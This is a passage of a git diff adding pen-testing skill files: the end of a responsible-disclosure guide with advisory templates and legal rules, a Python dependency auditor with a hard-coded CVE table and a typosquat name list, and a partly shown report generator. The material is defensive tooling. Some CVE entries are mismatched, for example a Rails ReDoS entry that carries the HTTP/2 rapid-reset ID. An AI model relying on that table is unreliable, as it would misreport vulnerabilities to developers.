[DATE - 5 days] so we can align on the disclosure approach. + +Best regards, +[Your Name] +``` + +### Public Disclosure Statement + +``` +# Security Advisory: [Title] + +**Reported:** [Date] +**Disclosed:** [Date] +**Vendor:** [Vendor Name] +**Status:** [Fixed in version X.Y.Z / Unpatched / Mitigated] + +## Summary +[Brief description accessible to non-technical readers.] + +## Technical Details +[Full technical description, reproduction steps, evidence.] + +## Impact +[What could be exploited and the blast radius.] + +## Timeline +| Date | Event | +|------|-------| +| [Date] | Vulnerability discovered | +| [Date] | Report submitted to vendor | +| [Date] | Vendor acknowledged | +| [Date] | Fix released (version X.Y.Z) | +| [Date] | Public disclosure | + +## Remediation +[Steps users should take — update to version X, apply config change, etc.] + +## Credit +Discovered by [Your Name] ([Organization]). +``` + +--- + +## Legal Considerations + +### Before You Test + +1. **Written authorization is required.** For external testing, obtain a signed rules-of-engagement document or scope-of-work. For bug bounty programs, the program's terms of service serve as authorization. + +2. **Understand local laws.** The Computer Fraud and Abuse Act (CFAA) in the US, the Computer Misuse Act in the UK, and equivalent laws in other jurisdictions criminalize unauthorized access. Authorization is your legal shield. + +3. **Stay within scope.** If the bug bounty program says "*.example.com only," do not test anything outside that scope. If your pen test contract covers the web application, do not pivot to internal networks. + +4. **Document everything.** Keep timestamped records of all testing activities: what you tested, when, what you found, and what you did not do (e.g., "did not access real user data"). + +### During Testing + +1. **Do not access real user data.** Use your own test accounts. If you accidentally access real data, stop immediately, document the incident, and report it to the vendor. + +2. **Do not cause damage.** No data destruction, no denial-of-service, no resource exhaustion. If a test might cause disruption, get explicit approval first. + +3. **Do not exfiltrate data.** Demonstrate the vulnerability with minimal proof. A screenshot showing "1000 records returned" is sufficient — downloading the records is not. + +4. **Do not install backdoors.** Even for "maintaining access during testing." If you need persistent access, work with the vendor's team. + +### During Disclosure + +1. **Do not threaten.** Disclosure timelines are industry practice, not ultimatums. Communicate professionally. + +2. **Do not sell vulnerability details.** Selling to exploit brokers instead of reporting to the vendor is irresponsible and may be illegal. + +3. **Give vendors reasonable time.** 90 days is standard. Complex architectural fixes may need more time if the vendor is communicating and making progress. + +4. **Do not publicly disclose details that help attackers exploit unpatched systems.** If the fix is not yet deployed, disclose the existence and severity of the issue without full exploitation details. + +--- + +## Bug Bounty Program Integration + +### Finding the Right Program + +1. **Check the vendor's website:** Look for `/security`, `/.well-known/security.txt`, or a security page +2. **Bug bounty platforms:** HackerOne, Bugcrowd, Intigriti, YesWeHack +3. **No program?** Report to `security@[vendor].com` or use CERT/CC as an intermediary + +### Bug Bounty Best Practices + +1. **Read the entire policy** before testing — scope, exclusions, safe harbor +2. **Test only in-scope assets** — out-of-scope findings may not be rewarded and could be legally risky +3. **Report one vulnerability per submission** — do not bundle unrelated issues +4. **Provide clear reproduction steps** — assume the reader cannot read your mind +5. **Do not duplicate** — search existing reports before submitting +6. **Be patient** — triage can take days to weeks depending on program volume +7. **Do not publicly disclose** until the program explicitly permits it + +### If No Bug Bounty Exists + +1. Report directly to `security@[vendor].com` +2. If no response after 14 days, try CERT/CC (https://www.kb.cert.org/vuls/report/) +3. Follow the standard disclosure timeline +4. Do not expect payment — responsible disclosure is an ethical practice, not a paid service + +--- + +## CVE Request Process + +### When to Request a CVE + +- The vulnerability affects publicly available software +- The vendor has confirmed the issue +- A fix is available or will be available soon + +### How to Request + +1. **Through the vendor:** If the vendor is a CNA (CVE Numbering Authority), they will assign the CVE +2. **Through MITRE:** If the vendor is not a CNA, submit a request at https://cveform.mitre.org/ +3. **Through a CNA:** Some platforms (HackerOne, GitHub) are CNAs and can assign CVEs for vulnerabilities in their scope + +### Information Required + +``` +- Vulnerability type (CWE ID if known) +- Affected product and version range +- Fixed version (if available) +- Attack vector (network, local, physical) +- Impact (confidentiality, integrity, availability) +- CVSS score and vector string +- Description (one paragraph, technical but readable) +- References (advisory URL, patch commit, bug report) +``` + +### CVE ID Format + +``` +CVE-YYYY-NNNNN +Example: CVE-2024-12345 +``` + +After assignment, the CVE will be published in the NVD (National Vulnerability Database) at https://nvd.nist.gov/. + +--- + +## Key Principles Summary + +1. **Report first, disclose later.** Always give the vendor a chance to fix the issue before going public. +2. **Minimize impact.** Prove the vulnerability exists without causing damage or accessing real data. +3. **Communicate professionally.** Security is stressful for everyone. Be clear, helpful, and patient. +4. **Document everything.** Timestamps, evidence, communications — protect yourself and the process. +5. **Follow through.** A report without follow-up helps no one. Stay engaged until the issue is resolved. +6. **Credit where due.** Acknowledge the vendor's response (positive or negative) in your disclosure. +7. **Know the law.** Authorization and scope are your legal foundations. Never test without them. diff --git a/engineering-team/security-pen-testing/scripts/dependency_auditor.py b/engineering-team/security-pen-testing/scripts/dependency_auditor.py new file mode 100644 index 0000000..07cbeff --- /dev/null +++ b/engineering-team/security-pen-testing/scripts/dependency_auditor.py @@ -0,0 +1,455 @@ +#!/usr/bin/env python3 +""" +Dependency Auditor - Analyze package manifests for known vulnerable patterns. + +Table of Contents: + DependencyAuditor - Main class for dependency vulnerability analysis + __init__ - Initialize with manifest path and severity filter + audit() - Run full audit on the manifest + _parse_manifest() - Detect and parse the manifest file + _parse_package_json() - Parse npm package.json + _parse_requirements() - Parse pip requirements.txt + _parse_go_mod() - Parse Go go.mod + _parse_gemfile() - Parse Ruby Gemfile + _check_vulnerabilities() - Check packages against known CVE patterns + _check_risky_patterns() - Detect risky dependency patterns + main() - CLI entry point + +Usage: + python dependency_auditor.py --file package.json + python dependency_auditor.py --file requirements.txt --severity high + python dependency_auditor.py --file go.mod --json +""" + +import argparse +import json +import os +import re +import sys +from dataclasses import dataclass, asdict, field +from datetime import datetime +from pathlib import Path +from typing import Dict, List, Optional, Tuple + + +@dataclass +class Dependency: + """Represents a parsed dependency.""" + name: str + version: str + ecosystem: str # npm, pypi, go, rubygems + is_dev: bool = False + + +@dataclass +class VulnerabilityFinding: + """A known vulnerability match for a dependency.""" + package: str + installed_version: str + vulnerable_range: str + cve_id: str + severity: str # critical, high, medium, low + title: str + description: str + remediation: str + cvss_score: float = 0.0 + references: List[str] = field(default_factory=list) + + +@dataclass +class RiskyPattern: + """A risky dependency pattern (not a CVE, but a concern).""" + package: str + pattern_type: str # pinning, wildcard, deprecated, typosquat + severity: str + description: str + recommendation: str + + +class DependencyAuditor: + """Analyze package manifests for known vulnerable patterns and risky dependencies.""" + + # Known vulnerable package versions (curated subset of high-profile CVEs) + KNOWN_VULNS = [ + {"ecosystem": "npm", "package": "lodash", "below": "4.17.21", + "cve": "CVE-2021-23337", "severity": "high", "cvss": 7.2, + "title": "Prototype Pollution in lodash", + "description": "lodash before 4.17.21 is vulnerable to Command Injection via template function.", + "remediation": "Upgrade lodash to >=4.17.21"}, + {"ecosystem": "npm", "package": "axios", "below": "1.6.0", + "cve": "CVE-2023-45857", "severity": "medium", "cvss": 6.5, + "title": "CSRF token exposure in axios", + "description": "axios before 1.6.0 inadvertently exposes CSRF tokens in cross-site requests.", + "remediation": "Upgrade axios to >=1.6.0"}, + {"ecosystem": "npm", "package": "express", "below": "4.19.2", + "cve": "CVE-2024-29041", "severity": "medium", "cvss": 6.1, + "title": "Open Redirect in express", + "description": "express before 4.19.2 allows open redirects via malicious URLs.", + "remediation": "Upgrade express to >=4.19.2"}, + {"ecosystem": "npm", "package": "jsonwebtoken", "below": "9.0.0", + "cve": "CVE-2022-23529", "severity": "critical", "cvss": 9.8, + "title": "Insecure key retrieval in jsonwebtoken", + "description": "jsonwebtoken before 9.0.0 allows key confusion attacks via secretOrPublicKey.", + "remediation": "Upgrade jsonwebtoken to >=9.0.0"}, + {"ecosystem": "npm", "package": "minimatch", "below": "3.0.5", + "cve": "CVE-2022-3517", "severity": "high", "cvss": 7.5, + "title": "ReDoS in minimatch", + "description": "minimatch before 3.0.5 is vulnerable to Regular Expression Denial of Service.", + "remediation": "Upgrade minimatch to >=3.0.5"}, + {"ecosystem": "npm", "package": "tar", "below": "6.1.9", + "cve": "CVE-2021-37713", "severity": "high", "cvss": 8.6, + "title": "Arbitrary File Creation in tar", + "description": "tar before 6.1.9 allows arbitrary file creation/overwrite via symlinks.", + "remediation": "Upgrade tar to >=6.1.9"}, + {"ecosystem": "pypi", "package": "pillow", "below": "9.3.0", + "cve": "CVE-2022-45198", "severity": "high", "cvss": 7.5, + "title": "DoS via crafted image in Pillow", + "description": "Pillow before 9.3.0 allows denial of service via specially crafted image files.", + "remediation": "Upgrade Pillow to >=9.3.0"}, + {"ecosystem": "pypi", "package": "django", "below": "4.2.8", + "cve": "CVE-2023-46695", "severity": "high", "cvss": 7.5, + "title": "DoS via file uploads in Django", + "description": "Django before 4.2.8 allows denial of service via large file uploads.", + "remediation": "Upgrade Django to >=4.2.8"}, + {"ecosystem": "pypi", "package": "flask", "below": "2.3.2", + "cve": "CVE-2023-30861", "severity": "high", "cvss": 7.5, + "title": "Session cookie exposure in Flask", + "description": "Flask before 2.3.2 may expose session cookies on cross-origin redirects.", + "remediation": "Upgrade Flask to >=2.3.2"}, + {"ecosystem": "pypi", "package": "requests", "below": "2.31.0", + "cve": "CVE-2023-32681", "severity": "medium", "cvss": 6.1, + "title": "Proxy-Authorization header leak in requests", + "description": "requests before 2.31.0 leaks Proxy-Authorization headers on redirects.", + "remediation": "Upgrade requests to >=2.31.0"}, + {"ecosystem": "pypi", "package": "cryptography", "below": "41.0.0", + "cve": "CVE-2023-38325", "severity": "high", "cvss": 7.5, + "title": "NULL dereference in cryptography", + "description": "cryptography before 41.0.0 has a NULL pointer dereference in PKCS7 parsing.", + "remediation": "Upgrade cryptography to >=41.0.0"}, + {"ecosystem": "pypi", "package": "pyyaml", "below": "6.0.1", + "cve": "CVE-2020-14343", "severity": "critical", "cvss": 9.8, + "title": "Arbitrary code execution in PyYAML", + "description": "PyYAML before 6.0.1 allows arbitrary code execution via yaml.load().", + "remediation": "Upgrade PyYAML to >=6.0.1 and use yaml.safe_load()"}, + {"ecosystem": "go", "package": "golang.org/x/crypto", "below": "0.17.0", + "cve": "CVE-2023-48795", "severity": "medium", "cvss": 5.9, + "title": "Terrapin SSH prefix truncation attack", + "description": "golang.org/x/crypto before 0.17.0 vulnerable to SSH prefix truncation.", + "remediation": "Upgrade golang.org/x/crypto to >=0.17.0"}, + {"ecosystem": "go", "package": "golang.org/x/net", "below": "0.17.0", + "cve": "CVE-2023-44487", "severity": "high", "cvss": 7.5, + "title": "HTTP/2 rapid reset DoS", + "description": "golang.org/x/net before 0.17.0 vulnerable to HTTP/2 rapid reset attack.", + "remediation": "Upgrade golang.org/x/net to >=0.17.0"}, + {"ecosystem": "rubygems", "package": "rails", "below": "7.0.8", + "cve": "CVE-2023-44487", "severity": "high", "cvss": 7.5, + "title": "ReDoS in Rails", + "description": "Rails before 7.0.8 vulnerable to Regular Expression Denial of Service.", + "remediation": "Upgrade rails to >=7.0.8"}, + ] + + # Known typosquat / malicious package names + TYPOSQUAT_PACKAGES = { + "npm": ["crossenv", "event-stream-malicious", "flatmap-stream", "ua-parser-jss", + "loadsh", "lodashs", "axois", "requets"], + "pypi": ["python3-dateutil", "jeIlyfish", "python-binance-sdk", "requestss", + "djago", "flassk", "requets"], + } + + def __init__(self, manifest_path: str, severity_filter: str = "low"): + self.manifest_path = Path(manifest_path) + self.severity_filter = severity_filter + self.severity_order = {"critical": 4, "high": 3, "medium": 2, "low": 1} + self.min_severity = self.severity_order.get(severity_filter, 1) + + def audit(self) -> Dict: + """Run full audit on the manifest file.""" + deps = self._parse_manifest() + vuln_findings = self._check_vulnerabilities(deps) + risky_patterns = self._check_risky_patterns(deps) + + # Filter by severity + vuln_findings = [f for f in vuln_findings + if self.severity_order.get(f.severity, 0) >= self.min_severity] + risky_patterns = [r for r in risky_patterns + if self.severity_order.get(r.severity, 0) >= self.min_severity] + + return { + "manifest": str(self.manifest_path), + "ecosystem": deps[0].ecosystem if deps else "unknown", + "total_dependencies": len(deps), + "dev_dependencies": len([d for d in deps if d.is_dev]), + "vulnerability_findings": vuln_findings, + "risky_patterns": risky_patterns, + "summary": { + "critical": len([f for f in vuln_findings if f.severity == "critical"]), + "high": len([f for f in vuln_findings if f.severity == "high"]), + "medium": len([f for f in vuln_findings if f.severity == "medium"]), + "low": len([f for f in vuln_findings if f.severity == "low"]), + "risky_patterns_count": len(risky_patterns), + } + } + + def _parse_manifest(self) -> List[Dependency]: + """Detect manifest type and parse dependencies.""" + name = self.manifest_path.name.lower() + try: + content = self.manifest_path.read_text(encoding="utf-8") + except (OSError, PermissionError) as e: + print(f"Error reading {self.manifest_path}: {e}", file=sys.stderr) + sys.exit(1) + + if name == "package.json": + return self._parse_package_json(content) + elif name in ("requirements.txt", "requirements-dev.txt", "requirements_dev.txt"): + return self._parse_requirements(content) + elif name == "go.mod": + return self._parse_go_mod(content) + elif name in ("gemfile", "gemfile.lock"): + return self._parse_gemfile(content) + else: + print(f"Unsupported manifest type: {name}", file=sys.stderr) + print("Supported: package.json, requirements.txt, go.mod, Gemfile", file=sys.stderr) + sys.exit(1) + + def _parse_package_json(self, content: str) -> List[Dependency]: + """Parse npm package.json.""" + deps = [] + try: + data = json.loads(content) + except json.JSONDecodeError as e: + print(f"Invalid JSON in package.json: {e}", file=sys.stderr) + sys.exit(1) + + for name, version in data.get("dependencies", {}).items(): + clean_ver = re.sub(r"[^0-9.]", "", version).strip(".") + deps.append(Dependency(name=name, version=clean_ver or version, ecosystem="npm", is_dev=False)) + for name, version in data.get("devDependencies", {}).items(): + clean_ver = re.sub(r"[^0-9.]", "", version).strip(".") + deps.append(Dependency(name=name, version=clean_ver or version, ecosystem="npm", is_dev=True)) + return deps + + def _parse_requirements(self, content: str) -> List[Dependency]: + """Parse pip requirements.txt.""" + deps = [] + for line in content.strip().split("\n"): + line = line.strip() + if not line or line.startswith("#") or line.startswith("-"): + continue + match = re.match(r"^([a-zA-Z0-9_.-]+)\s*(?:[=<>!~]+\s*)?([\d.]*)", line) + if match: + name, version = match.group(1), match.group(2) or "unknown" + deps.append(Dependency(name=name.lower(), version=version, ecosystem="pypi")) + return deps + + def _parse_go_mod(self, content: str) -> List[Dependency]: + """Parse Go go.mod.""" + deps = [] + in_require = False + for line in content.strip().split("\n"): + line = line.strip() + if line.startswith("require ("): + in_require = True + continue + if line == ")": + in_require = False + continue + if in_require or line.startswith("require "): + cleaned = line.replace("require ", "").strip() + parts = cleaned.split() + if len(parts) >= 2: + name = parts[0] + version = parts[1].lstrip("v") + indirect = "// indirect" in line + deps.append(Dependency(name=name, version=version, ecosystem="go", is_dev=indirect)) + return deps + + def _parse_gemfile(self, content: str) -> List[Dependency]: + """Parse Ruby Gemfile.""" + deps = [] + for line in content.strip().split("\n"): + line = line.strip() + if not line or line.startswith("#"): + continue + match = re.match(r'''gem\s+['"]([\w-]+)['"](?:\s*,\s*['"]([^'"]*)['"'])?''', line) + if match: + name = match.group(1) + version = match.group(2) or "unknown" + version = re.sub(r"[~><=\s]", "", version) + deps.append(Dependency(name=name, version=version, ecosystem="rubygems")) + return deps + + @staticmethod + def _version_below(installed: str, threshold: str) -> bool: + """Check if installed version is below threshold (simple numeric comparison).""" + try: + inst_parts = [int(x) for x in installed.split(".") if x.isdigit()] + thresh_parts = [int(x) for x in threshold.split(".") if x.isdigit()] + # Pad shorter list + max_len = max(len(inst_parts), len(thresh_parts)) + inst_parts.extend([0] * (max_len - len(inst_parts))) + thresh_parts.extend([0] * (max_len - len(thresh_parts))) + return inst_parts < thresh_parts + except (ValueError, IndexError): + return False + + def _check_vulnerabilities(self, deps: List[Dependency]) -> List[VulnerabilityFinding]: + """Check dependencies against known CVE database.""" + findings = [] + for dep in deps: + for vuln in self.KNOWN_VULNS: + if (dep.ecosystem == vuln["ecosystem"] and + dep.name.lower() == vuln["package"].lower() and + self._version_below(dep.version, vuln["below"])): + findings.append(VulnerabilityFinding( + package=dep.name, + installed_version=dep.version, + vulnerable_range=f"< {vuln['below']}", + cve_id=vuln["cve"], + severity=vuln["severity"], + title=vuln["title"], + description=vuln["description"], + remediation=vuln["remediation"], + cvss_score=vuln.get("cvss", 0.0), + references=[f"https://nvd.nist.gov/vuln/detail/{vuln['cve']}"], + )) + return findings + + def _check_risky_patterns(self, deps: List[Dependency]) -> List[RiskyPattern]: + """Detect risky dependency patterns.""" + patterns = [] + ecosystem = deps[0].ecosystem if deps else "unknown" + + # Check for typosquat packages + typosquats = self.TYPOSQUAT_PACKAGES.get(ecosystem, []) + for dep in deps: + if dep.name.lower() in [t.lower() for t in typosquats]: + patterns.append(RiskyPattern( + package=dep.name, + pattern_type="typosquat", + severity="critical", + description=f"'{dep.name}' is a known typosquat or malicious package name.", + recommendation="Remove immediately and check for compromised data. Install the legitimate package.", + )) + + # Check for wildcard/unpinned versions + for dep in deps: + if dep.version in ("*", "latest", "unknown", ""): + patterns.append(RiskyPattern( + package=dep.name, + pattern_type="unpinned", + severity="medium", + description=f"'{dep.name}' has an unpinned version ({dep.version}).", + recommendation="Pin to a specific version to prevent supply chain attacks.", + )) + + # Check for excessive dev dependencies in production + dev_count = len([d for d in deps if d.is_dev]) + total = len(deps) + if total > 0 and dev_count / total > 0.7: + patterns.append(RiskyPattern( + package="(project-level)", + pattern_type="dev-heavy", + severity="low", + description=f"{dev_count}/{total} dependencies are dev-only. Large dev surface increases supply chain risk.", + recommendation="Review dev dependencies. Remove unused ones. Consider using --production for installs.", + )) + + return patterns + + +def format_report_text(result: Dict) -> str: + """Format audit result as human-readable text.""" + lines = [] + lines.append("=" * 70) + lines.append("DEPENDENCY VULNERABILITY AUDIT REPORT") + lines.append(f"Manifest: {result['manifest']}") + lines.append(f"Ecosystem: {result['ecosystem']}") + lines.append(f"Total dependencies: {result['total_dependencies']} ({result['dev_dependencies']} dev)") + lines.append(f"Generated: {datetime.now().strftime('%Y-%m-%d %H:%M:%S')}") + lines.append("=" * 70) + + summary = result["summary"] + lines.append(f"\nSummary: {summary['critical']} critical, {summary['high']} high, " + f"{summary['medium']} medium, {summary['low']} low, " + f"{summary['risky_patterns_count']} risky pattern(s)") + + vulns = result["vulnerability_findings"] + if vulns: + lines.append(f"\n--- VULNERABILITY FINDINGS ({len(vulns)}) ---\n") + for v in vulns: + lines.append(f" [{v.severity.upper()}] {v.package} {v.installed_version}") + lines.append(f" CVE: {v.cve_id} (CVSS: {v.cvss_score})") + lines.append(f" {v.title}") + lines.append(f" Vulnerable: {v.vulnerable_range}") + lines.append(f" Fix: {v.remediation}") + lines.append("") + else: + lines.append("\nNo known vulnerabilities found in dependencies.") + + risky = result["risky_patterns"] + if risky: + lines.append(f"\n--- RISKY PATTERNS ({len(risky)}) ---\n") + for r in risky: + lines.append(f" [{r.severity.upper()}] {r.package} — {r.pattern_type}") + lines.append(f" {r.description}") + lines.append(f" Fix: {r.recommendation}") + lines.append("") + + return "\n".join(lines) + + +def main(): + parser = argparse.ArgumentParser( + description="Dependency Auditor — Analyze package manifests for known vulnerabilities and risky patterns.", + formatter_class=argparse.RawDescriptionHelpFormatter, + epilog=""" +Supported manifests: + package.json (npm) + requirements.txt (pip/PyPI) + go.mod (Go) + Gemfile (Ruby) + +Examples: + %(prog)s --file package.json + %(prog)s --file requirements.txt --severity high + %(prog)s --file go.mod --json + """, + ) + parser.add_argument("--file", required=True, metavar="PATH", + help="Path to package manifest file") + parser.add_argument("--severity", choices=["low", "medium", "high", "critical"], default="low", + help="Minimum severity to report (default: low)") + parser.add_argument("--json", action="store_true", dest="json_output", + help="Output results as JSON") + args = parser.parse_args() + + if not Path(args.file).exists(): + print(f"Error: File not found: {args.file}", file=sys.stderr) + sys.exit(1) + + auditor = DependencyAuditor(manifest_path=args.file, severity_filter=args.severity) + result = auditor.audit() + + if args.json_output: + json_result = { + "manifest": result["manifest"], + "ecosystem": result["ecosystem"], + "total_dependencies": result["total_dependencies"], + "dev_dependencies": result["dev_dependencies"], + "summary": result["summary"], + "vulnerability_findings": [asdict(f) for f in result["vulnerability_findings"]], + "risky_patterns": [asdict(r) for r in result["risky_patterns"]], + "generated_at": datetime.now().isoformat(), + } + print(json.dumps(json_result, indent=2)) + else: + print(format_report_text(result)) + + # Exit non-zero if critical or high vulnerabilities found + if result["summary"]["critical"] > 0 or result["summary"]["high"] > 0: + sys.exit(1) + + +if __name__ == "__main__": + main() diff --git a/engineering-team/security-pen-testing/scripts/pentest_report_generator.py b/engineering-team/security-pen-testing/scripts/pentest_report_generator.py new file mode 100644 index 0000000..91087ba --- /dev/null +++ b/engineering-team/security-pen-testing/scripts/pentest_report_generator.py @@ -0,0 +1,462 @@ +#!/usr/bin/env python3 +""" +Pen Test Report Generator - Generate structured penetration testing reports from findings. + +Table of Contents: + PentestReportGenerator - Main class for report generation + __init__ - Initialize with findings data + generate_markdown() - Generate markdown report + generate_json() - Generate structured JSON report + _executive_summary() - Build executive summary section + _findings_table() - Build severity-sorted findings table + _detailed_findings() - Build detailed findings with evidence + _remediation_matrix() - Build effort vs. impact remediation matrix + _calculate_risk_score() - Calculate overall risk score + main() - CLI entry point + +Usage: + python pentest_report_generator.py --findings findings.json --format md --output report.md + python pentest_report_generator.py --findings findings.json --format json + python pentest_report_generator.py --findings findings.json --format md +""" + +import argparse +import json +import sys +from dataclasses import dataclass, asdict, field +from datetime import datetime +from pathlib import Path +from typing import Dict, List, Optional + + +@dataclass +class Finding: + """A single pen test finding.""" + title: str + severity: str # critical, high, medium, low, info + cvss_score: float + category: str + description: str + evidence: str + impact: str + remediation: str + cvss_vector: str = "" + references: List[str] = field(default_factory=list) + effort: str = "medium" # low, medium, high — remediation effort + + +SEVERITY_ORDER = {"critical": 5, "high": 4, "medium": 3, "low": 2, "info": 1} + + +class PentestReportGenerator: + """Generate professional penetration testing reports from structured findings.""" + + def __init__(self, findings: List[Finding], metadata: Optional[Dict] = None): + self.findings = sorted(findings, key=lambda f: SEVERITY_ORDER.get(f.severity, 0), reverse=True) + self.metadata = metadata or {} + self.generated_at = datetime.now().strftime("%Y-%m-%d %H:%M:%S") + + def generate_markdown(self) -> str: + """Generate a complete markdown pen test report.""" + sections = [] + sections.append(self._header()) + sections.append(self._executive_summary()) + sections.append(self._scope_section()) + sections.append(self._findings_table()) + sections.append(self._detailed_findings()) + sections.append(self._remediation_matrix()) + sections.append(self._methodology_section()) + sections.append(self._appendix()) + return "\n\n".join(sections) + + def generate_json(self) -> Dict: + """Generate structured JSON report.""" + return { + "report_metadata": { + "title": self.metadata.get("title", "Penetration Test Report"), + "target": self.metadata.get("target", "Not specified"), + "tester": self.metadata.get("tester", "Not specified"), + "date_range": self.metadata.get("date_range", "Not specified"), + "generated_at": self.generated_at, + "overall_risk_score": self._calculate_risk_score(), + "overall_risk_level": self._risk_level(), + }, + "summary": { + "total_findings": len(self.findings), + "critical": len([f for f in self.findings if f.severity == "critical"]), + "high": len([f for f in self.findings if f.severity == "high"]), + "medium": len([f for f in self.findings if f.severity == "medium"]), + "low": len([f for f in self.findings if f.severity == "low"]), + "info": len([f for f in self.findings if f.severity == "info"]), + }, + "findings": [asdict(f) for f in self.findings], + "remediation_priority": self._remediation_priority_list(), + } + + def _header(self) -> str: + title = self.metadata.get("title", "Penetration Test Report") + target = self.metadata.get("target", "Not specified") + tester = self.metadata.get("tester", "Not specified") + date_range = self.metadata.get("date_range", "Not specified") + lines = [ + f"# {title}", + "", + "| Field | Value |", + "|-------|-------|", + f"| **Target** | {target} |", + f"| **Tester** | {tester} |", + f"| **Date Range** | {date_range} |", + f"| **Report Generated** | {self.generated_at} |", + f"| **Overall Risk** | {self._risk_level()} (Score: {self._calculate_risk_score():.1f}/10) |", + f"| **Total Findings** | {len(self.findings)} |", + ] + return "\n".join(lines) + + def _executive_summary(self) -> str: + critical = len([f for f in self.findings if f.severity == "critical"]) + high = len([f for f in self.findings if f.severity == "high"]) + medium = len([f for f in self.findings if f.severity == "medium"]) + low = len([f for f in self.findings if f.severity == "low"]) + info = len([f for f in self.findings if f.severity == "info"]) + risk_score = self._calculate_risk_score() + risk_level = self._risk_level() + + lines = [ + "## Executive Summary", + "", + f"This penetration test identified **{len(self.findings)} findings** across the target application. " + f"The overall risk level is **{risk_level}** with a score of **{risk_score:.1f}/10**.", + "", + "### Finding Severity Distribution", + "", + "| Severity | Count |", + "|----------|-------|", + f"| Critical | {critical} |", + f"| High | {high} |", + f"| Medium | {medium} |", + f"| Low | {low} |", + f"| Informational | {info} |", + ] + + # Top 3 findings + if self.findings: + lines.append("") + lines.append("### Top Priority Findings") + lines.append("") + for i, f in enumerate(self.findings[:3], 1): + lines.append(f"{i}. **{f.title}** ({f.severity.upper()}, CVSS {f.cvss_score}) — {f.impact[:120]}") + + # Risk assessment + lines.append("") + if critical > 0: + lines.append("> **CRITICAL RISK**: Immediate remediation required. Critical vulnerabilities " + "allow attackers to compromise the system with minimal effort.") + elif high > 0: + lines.append("> **HIGH RISK**: Prompt remediation recommended. High-severity vulnerabilities " + "pose significant risk of exploitation.") + elif medium > 0: + lines.append("> **MODERATE RISK**: Remediation should be planned within the next sprint. " + "Medium findings may be chained for greater impact.") + else: + lines.append("> **LOW RISK**: The application has a reasonable security posture. " + "Address low-severity findings during regular maintenance.") + + return "\n".join(lines) + + def _scope_section(self) -> str: + scope = self.metadata.get("scope", "Full application security assessment") + exclusions = self.metadata.get("exclusions", "None specified") + test_type = self.metadata.get("test_type", "Gray box") + lines = [ + "## Scope", + "", + f"- **In Scope**: {scope}", + f"- **Exclusions**: {exclusions}", + f"- **Test Type**: {test_type}", + ] + return "\n".join(lines) + + def _findings_table(self) -> str: + lines = [ + "## Findings Overview", + "", + "| # | Severity | CVSS | Title | Category |", + "|---|----------|------|-------|----------|", + ] + for i, f in enumerate(self.findings, 1): + sev_badge = f.severity.upper() + lines.append(f"| {i} | {sev_badge} | {f.cvss_score} | {f.title} | {f.category} |") + return "\n".join(lines) + + def _detailed_findings(self) -> str: + lines = ["## Detailed Findings"] + for i, f in enumerate(self.findings, 1): + lines.append("") + lines.append(f"### {i}. {f.title}") + lines.append("") + lines.append(f"**Severity:** {f.severity.upper()} | **CVSS:** {f.cvss_score}" + + (f" | **Vector:** `{f.cvss_vector}`" if f.cvss_vector else "")) + lines.append(f"**Category:** {f.category}") + lines.append("") + lines.append("#### Description") + lines.append("") + lines.append(f"{f.description}") + lines.append("") + lines.append("#### Evidence") + lines.append("") + lines.append("```") + lines.append(f"{f.evidence}") + lines.append("```") + lines.append("") + lines.append("#### Impact") + lines.append("") + lines.append(f"{f.impact}") + lines.append("") + lines.append("#### Remediation") + lines.append("") + lines.append(f"{f.remediation}") + if f.references: + lines.append("") + lines.append("#### References") + lines.append("") + for ref in f.references: + lines.append(f"- {ref}") + return "\n".join(lines) + + def _remediation_matrix(self) -> str: + lines = [ + "## Remediation Priority Matrix", + "", + "Prioritize remediation based on severity and effort:", + "", + "| # | Finding | Severity | Effort | Priority |", + "|---|---------|----------|--------|----------|", + ] + for i, f in enumerate(self.findings, 1): + priority = self._compute_priority(f) + lines.append(f"| {i} | {f.title} | {f.severity.upper()} | {f.effort} | {priority} |") + + lines.append("") + lines.append("**Priority Key:** P1 = Fix immediately, P2 = Fix this sprint, " + "P3 = Fix this quarter, P4 = Backlog") + return "\n".join(lines) + + def _methodology_section(self) -> str: + lines = [ + "## Methodology", + "", + "Testing followed the OWASP Testing Guide v4.2 and PTES (Penetration Testing Execution Standard):", + "", + "1. **Reconnaissance** — Mapped attack surface, identified endpoints and technologies", + "2. **Vulnerability Discovery** — Automated scanning + manual testing for OWASP Top 10", + "3. **Exploitation** — Validated findings with proof-of-concept (non-destructive)", + "4. **Post-Exploitation** — Assessed lateral movement and data access potential", + "5. **Reporting** — Documented findings with evidence and remediation guidance", + ] + return "\n".join(lines) + + def _appendix(self) -> str: + lines = [ + "## Appendix", + "", + "### CVSS Scoring Reference", + "", + "| Score Range | Severity |", + "|-------------|----------|", + "| 9.0 - 10.0 | Critical |", + "| 7.0 - 8.9 | High |", + "| 4.0 - 6.9 | Medium |", + "| 0.1 - 3.9 | Low |", + "| 0.0 | Informational |", + "", + "### Disclaimer", + "", + "This report represents a point-in-time assessment. New vulnerabilities may emerge after " + "the testing period. Regular security assessments are recommended.", + "", + f"---\n\n*Report generated on {self.generated_at}*", + ] + return "\n".join(lines) + + def _calculate_risk_score(self) -> float: + """Calculate overall risk score (0-10) based on findings.""" + if not self.findings: + return 0.0 + # Weighted by severity + weights = {"critical": 10, "high": 7, "medium": 4, "low": 1.5, "info": 0.5} + total_weight = sum(weights.get(f.severity, 0) for f in self.findings) + # Normalize: cap at 10, scale based on number of findings + score = min(10.0, total_weight / max(len(self.findings) * 0.5, 1)) + return round(score, 1) + + def _risk_level(self) -> str: + """Return risk level string based on score.""" + score = self._calculate_risk_score() + if score >= 9.0: + return "CRITICAL" + elif score >= 7.0: + return "HIGH" + elif score >= 4.0: + return "MEDIUM" + elif score > 0: + return "LOW" + return "NONE" + + def _compute_priority(self, finding: Finding) -> str: + """Compute remediation priority from severity and effort.""" + sev = SEVERITY_ORDER.get(finding.severity, 0) + effort_map = {"low": 3, "medium": 2, "high": 1} + effort_val = effort_map.get(finding.effort, 2) + score = sev * effort_val + if score >= 12: + return "P1" + elif score >= 8: + return "P2" + elif score >= 4: + return "P3" + return "P4" + + def _remediation_priority_list(self) -> List[Dict]: + """Return ordered list of remediation priorities for JSON output.""" + result = [] + for f in self.findings: + result.append({ + "title": f.title, + "severity": f.severity, + "effort": f.effort, + "priority": self._compute_priority(f), + "remediation": f.remediation, + }) + return result + + +def load_findings(path: str) -> tuple: + """Load findings from a JSON file.""" + try: + content = Path(path).read_text(encoding="utf-8") + data = json.loads(content) + except (OSError, json.JSONDecodeError) as e: + print(f"Error loading findings: {e}", file=sys.stderr) + sys.exit(1) + + # Support both list-of-findings and object-with-metadata formats + metadata = {} + 